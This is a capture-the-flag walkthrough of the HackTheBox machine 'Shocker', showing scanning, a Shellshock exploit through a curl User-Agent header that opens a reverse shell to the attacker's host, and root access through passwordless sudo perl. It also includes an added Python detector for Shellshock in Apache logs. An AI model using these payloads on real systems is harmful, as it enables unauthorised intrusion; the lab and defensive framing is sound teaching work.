Walkthrough: Shocker[HTB]

Pulkit Mital
4 min read · Feb 2, 2021


Target Machine Information:
Host Name: Shocker
IP Address: 10.129.90.38
OS: Linux

Overview

In this walkthrough, I will show how to follow a step-by-step methodology to own user and root without Metasploit.

Step 1 — In the first step we will use Nmap to scan the target for all open ports, the services running on those ports and the OS running on the target machine. It can be done with the following command:

sudo nmap -A -O 10.129.90.38

From the Nmap scan these ports and services are active on the machine:

  • Port 80 — HTTP Service running apache httpd 2.4.18
  • Port 2222 — SSH Service running with version OpenSSH 7.2p2

Step 2 — Looking at the ports, we see that the machine is running an Apache web server. Now let’s run a Nikto scan to see whether it finds any vulnerabilities.

nikto -h 10.129.90.38

As we see from the Nikto scan, it did not find anything useful that helps us pwn this machine.

Step 3 — Since this is a web server, let’s run a directory search to see if there is any useful directory that will help us pwn this machine. Let’s run the command below:

dirb http://10.129.90.38/

In the dirb scan, we found various files and directories, among them a useful directory, cgi-bin, which suggests the machine may be vulnerable to Shellshock.
Let’s scan the cgi-bin directory for any shell scripts that we can use.

Step 4 — Now let’s scan the cgi-bin directory for any shell scripts or other useful file extensions using the command below:

dirb http://10.129.90.38/cgi-bin/

In the dirb scan, we found a shell script, user.sh.

Step 5 — Let’s look into the user.sh shell script that we found in the previous scan:

curl -vvv http://10.129.90.38/cgi-bin/user.sh

Step 6 — Let’s try the Shellshock vulnerability to get a reverse shell using the command below. Start a netcat listener first to catch the shell.

curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.29/9000 0>&1' http://10.129.90.38/cgi-bin/user.sh

Meanwhile, the tab where you started the listener will receive the shell, as shown below.
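From the defender’s side, the request above leaves a distinctive trace: the function-definition prefix lands in a header Apache writes to its access log. The following detector is an added example, not code from the original post; it parses constructed Apache combined-format log lines and flags entries whose logged User-Agent or Referer carries that prefix.

```python
import re
from typing import Dict, List, Optional

# Constructed sample Apache "combined" access-log lines (not from the original post).
# Lines 2 and 4 carry a bash function definition ("() { ... };") in a header the
# server logs, the same request shape the walkthrough sends to /cgi-bin/user.sh.
SAMPLE_LOG = """\
10.10.14.29 - - [02/Feb/2021:10:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "curl/7.74.0"
10.10.14.29 - - [02/Feb/2021:10:00:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.29/9000 0>&1"
10.10.14.29 - - [02/Feb/2021:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.14.29 - - [02/Feb/2021:10:00:12 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "() { ignored; }; id" "Mozilla/5.0"
"""

# Apache combined format: ip ident user [ts] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock trigger: an environment value that begins with a bash function
# definition "() { ... };" followed by trailing commands. Whitespace between the
# tokens varies in practice, so the pattern tolerates it.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;')


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format log line into named fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_shellshock_attempt(entry: Dict[str, str]) -> bool:
    """True if a logged header (User-Agent or Referer) carries a function-definition payload."""
    return any(SHELLSHOCK_RE.search(entry[field]) for field in ("ua", "referer"))


def find_shellshock_attempts(log_text: str) -> List[Dict[str, str]]:
    """Return the parsed entries that look like Shellshock attempts, in log order."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and is_shellshock_attempt(entry):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["path"]} UA={hit["ua"]!r}')
```

The combined log records only the Referer and User-Agent headers, while a CGI script receives every request header in its environment, so log-based detection sees a subset of attempts; the durable fix is a patched bash and no CGI scripts that invoke it.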

Now we see that we have a low-privilege shell as a user. We can go to the /home/shelly directory to read user.txt and get the flag. Thus we own user.

Step 7 — Now let’s try to escalate privileges. Run the command below:

sudo -l

When you run this command, you will see that you can run perl with sudo without a password. Let’s run the command below to get a root shell using perl:

sudo perl -e 'exec "/bin/bash";'

After running the above command, you will notice that you have a root shell.

Now we can navigate to the /root directory and get the flag stored in the file root.txt.
